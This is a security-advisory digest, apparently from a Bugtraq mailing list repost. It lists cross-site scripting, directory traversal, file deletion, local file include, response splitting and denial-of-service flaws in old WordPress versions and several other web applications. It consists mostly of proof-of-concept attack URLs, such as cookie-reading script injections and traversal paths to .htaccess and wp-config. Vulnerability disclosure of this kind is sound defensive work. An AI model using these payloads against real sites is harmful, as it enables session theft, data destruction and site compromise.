Multiple Vulnerabilities in Wordpress and other Web applications

Dear bugtraq, Below is a digest of vulnerabilities published by http://securityvulns.com/ and believed to be previously unpublished in English. All vulnerabilities were reported by MustLive (http://websecurity.com.ua/). 1. AwesomeTemplateEngine Crossite scripting Multiple crossite scripting (require register_globvals): http://site/templates/example_template.php?data[title]=%3C/title%3E%3Csc ript%3Ealert(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[message]=%3Cscript%3Eale rt(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[table][1][item]=%3Cscrip t%3Ealert(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[table][1][url]=%22%3E%3C script%3Ealert(document.cookie)%3C/script%3E http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ea lert(document.cookie)%3C/script%3E Original article (in Russian): http://securityvulns.ru/Sdocument784.html Additional details (in Ukrainian): http://websecurity.com.ua/1694/ 2. Wordpress multiple security vulnerabilities: 2.1 information disclosure (WordPress 2.2/2.3) Invalid request disclosures database structure and local paths: http://site/?feed=rss2&p=1 Original article (in Russian): http://securityvulns.ru/Sdocument663.html Additional details (in Ukrainian): http://websecurity.com.ua/1634/ 2.2 crossite scripting (WordPress <= 2.0.9) http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(a lert(document.cookie))%22 http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expressi on(alert(document.cookie))%22 Original article (in Russian): http://securityvulns.ru/Sdocument714.html Additional details (in Ukrainian): http://websecurity.com.ua/1658/ 2.3 Directory traversal, Arbitrary file deletion, Denial of Service and Cross-Site Scripting via wp-db-backup.php Directory Traversal (WordPress <= 2.0.3): http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htacce ss http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htacc ess Arbitrary file deletion and DoS (WordPress <= 2.0.3): http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htacce ss http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htacc ess http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.p hp http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index. php XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x): http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ea lert(document.cookie)%3C/script%3E Original article (in Russian): http://securityvulns.ru/Sdocument755.html Additional details (in Ukrainian): http://websecurity.com.ua/1676/ 2.4 Local file include, Directory traversal and Full path disclosure (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x) Full path disclosure: http://site/wp-admin/admin.php?import=\..\..\wp-config http://site/wp-admin/themes.php?page= http://site/wp-admin/edit.php?page= http://site/wp-admin/admin.php?page= http://site/wp-admin/templates.php?file= http://site/wp-admin/templates.php?page= http://site/wp-admin/edit-pages.php?page= http://site/wp-admin/categories.php?page= http://site/wp-admin/edit-comments.php?page= http://site/wp-admin/moderation.php?page= http://site/wp-admin/post.php?page= http://site/wp-admin/page-new.php?page= http://site/wp-admin/index.php?page= http://site/wp-admin/link-manager.php?page= http://site/wp-admin/link-add.php?page= http://site/wp-admin/link-categories.php?page= http://site/wp-admin/link-import.php?page= http://site/wp-admin/theme-editor.php?page= http://site/wp-admin/plugins.php?page= http://site/wp-admin/plugin-editor.php?page= http://site/wp-admin/profile.php?page= http://site/wp-admin/users.php?page= http://site/wp-admin/options-general.php?page= http://site/wp-admin/options-writing.php?page= http://site/wp-admin/options-reading.php?page= http://site/wp-admin/options-discussion.php?page= http://site/wp-admin/options-permalink.php?page= http://site/wp-admin/options-misc.php?page= http://site/wp-admin/import.php?page= http://site/wp-admin/admin.php?page= http://site/wp-admin/admin-footer.php http://site/wp-admin/admin-functions.php http://site/wp-admin/edit-form.php http://site/wp-admin/edit-form-advanced.php http://site/wp-admin/edit-form-comment.php http://site/wp-admin/edit-link-form.php http://site/wp-admin/edit-page-form.php http://site/wp-admin/menu.php http://site/wp-admin/menu-header.php http://site/wp-admin/import/blogger.php http://site/wp-admin/import/dotclear.php http://site/wp-admin/import/greymatter.php http://site/wp-admin/import/livejournal.php http://site/wp-admin/import/mt.php http://site/wp-admin/import/rss.php http://site/wp-admin/import/textpattern.php http://site/wp-admin/bookmarklet.php?page= http://site/wp-admin/cat-js.php?page= http://site/wp-admin/inline-uploading.php?page= http://site/wp-admin/options.php?page= http://site/wp-admin/profile-update.php?page= http://site/wp-admin/sidebar.php?page= http://site/wp-admin/user-edit.php?page= Local file include and Directory traversal: http://site/wp-admin/admin.php?import=\..\..\file http://site/wp-admin/themes.php?page=\..\..\file.php http://site/wp-admin/themes.php?page=\..\..\.htaccess http://site/wp-admin/edit.php?page=\..\..\file.php http://site/wp-admin/edit.php?page=\..\..\.htaccess http://site/wp-admin/admin.php?page=\..\..\file.php http://site/wp-admin/admin.php?page=\..\..\.htaccess http://site/wp-admin/templates.php?page=\..\..\file.php http://sites/wp-admin/templates.php?page=\..\..\.htaccess http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess http://site/wp-admin/categories.php?page=\..\..\.htaccess http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess http://site/wp-admin/moderation.php?page=\..\..\.htaccess http://site/wp-admin/post.php?page=\..\..\.htaccess http://site/wp-admin/page-new.php?page=\..\..\.htaccess http://site/wp-admin/index.php?page=\..\..\file.php http://site/wp-admin/index.php?page=\..\..\.htaccess http://site/wp-admin/link-manager.php?page=\..\..\.htaccess http://site/wp-admin/link-add.php?page=\..\..\.htaccess http://site/wp-admin/link-categories.php?page=\..\..\.htaccess http://site/wp-admin/link-import.php?page=\..\..\.htaccess http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess http://site/wp-admin/profile.php?page=\..\..\.htaccess http://site/wp-admin/users.php?page=\..\..\.htaccess http://site/wp-admin/options-general.php?page=\..\..\.htaccess http://site/wp-admin/options-writing.php?page=\..\..\.htaccess http://site/wp-admin/options-reading.php?page=\..\..\.htaccess http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess http://site/wp-admin/options-misc.php?page=\..\..\.htaccess http://site/wp-admin/import.php?page=\..\..\.htaccess http://site/wp-admin/admin.php?page=\..\..\.htaccess http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess http://site/wp-admin/cat-js.php?page=\..\..\.htaccess http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess http://site/wp-admin/options.php?page=\..\..\.htaccess http://site/wp-admin/profile-update.php?page=\..\..\.htaccess http://site/wp-admin/sidebar.php?page=\..\..\.htaccess http://site/wp-admin/user-edit.php?page=\..\..\.htaccess Arbitrary file edit: http://site/wp-admin/templates.php?file=\..\..\file Attacks with backslash are possible in Windows version. Original article (in Russian): http://securityvulns.ru/Sdocument762.html http://securityvulns.ru/Sdocument768.html http://securityvulns.ru/Sdocument773.html http://securityvulns.ru/Sdocument772.html Additional detail (in Ukrainian): http://websecurity.com.ua/1679/ http://websecurity.com.ua/1683/ http://websecurity.com.ua/1686/ http://websecurity.com.ua/1687/ 3. Crossite scripting and Denial of Service in PRO-Search <= 0.17 XSS: http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr ipt%3E http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/scrip t%3E Denial of Service: http://site/?show_page=20000&time=0 Original article (in Russian): http://securityvulns.ru/Sdocument731.html Additional details (in Ukrainian): http://websecurity.com.ua/1259/ 4. Persistant crossite scripting and request forgery in WP-ContactForm <= 1.5 alpha (WordPress plugin) POST request to http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform. php with different form fields. Exploits: http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html Original article (in Russian): http://securityvulns.ru/Sdocument667.html http://securityvulns.ru/Sdocument546.html Additional details (in Ukrainian): http://websecurity.com.ua/1641/ http://websecurity.com.ua/1600/ 5. RotaBanner Local <= 3 crossite scripting http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3 C/script%3E http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie )%3C/script%3E Original article (in Russian): http://securityvulns.ru/Sdocument625.html Additional details (in Ukrainian): http://websecurity.com.ua/1442/ 6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(do cument.cookie)%3C/script%3E Original article (in Russian): http://securityvulns.ru/Sdocument472.html Additional details (in Ukrainian): http://websecurity.com.ua/1454/ -=-=-=- There are also few vulnerabilities published in English as a part of the Month of Bugs in CAPTCHA: Cryptographp <= 1.2 WordPress plugin multiple persistant crossite scriptings Original article: http://websecurity.com.ua/1596/ XSS in Math Comment Spam Protection < 2.2 Original article: http://websecurity.com.ua/1576/ XSS in Captcha! <= 2.5d Original article: http://websecurity.com.ua/1588/ -- http://securityvulns.com/ /\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-------------o66o--+ / |/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top